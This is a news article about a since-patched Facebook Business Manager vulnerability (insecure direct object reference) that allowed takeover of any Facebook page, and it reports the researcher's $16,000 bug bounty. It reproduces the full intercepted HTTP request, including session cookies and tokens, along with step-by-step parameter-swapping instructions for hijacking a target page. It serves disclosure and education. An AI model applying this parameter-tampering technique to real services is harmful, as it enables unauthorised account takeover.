Security Researcher Found Facebook Vulnerability To Hack Any Facebook Page

Indian Security Researcher  Arun Sureshkumar Found Facebook Vulnerability To Hack Any Facebook Page. 

• He described the proof of concept of vulnerability in its blog
• It was the critical vulnerability, which allow to takeover any page with admin permission, that can perform critical actions like page deletion.
• He got $16000 Bug Bounty award from Facebook

Vulnerability Description:

Accoriding to Owasp, Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.

Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

Prerequisite:

1. Facebook Business Account (2 no’s).
One as own business and other can be any test account business.

Here i use my account business id as :  907970555981524
And another one , any partner id so i will choose it from my test account.  991079870975788

2. Add a partner using my own business and just intercept the request.

Now you can see the Vulnerable Request :

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1

Host: business.facebook.com

Connection: close

Content-Length: 436

Origin: https://business.facebook.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733

3. Change asset id to the page you want to hack. and also interchange the parent_business_id with agency_id.

ie,
parent_business_id= 991079870975788

agency_id= 907970555981524

asset_id =190313461381022

role= MANAGER

4. Resend the request.

Request send successfully. Page added to the Facebook Business Manager of the attacker with permission role Manager.

5. Assigned me as the admin of the page, which was added by the exploit.

6. Browse the page using the Facebook.

Video POC

As conversation with Arun, he told to HOC,

Thanking Facebook Security team for the quick fix and great responses to my queries too.

Arun reported on 29 Aug 2016 to Facebook security team and Facebook patched the vulnerability on 6th September. On 16 September, Facebook security team rewarded of $16000 USD as a part of bug bounty program.

HOC team congratulate to Arun and for better future.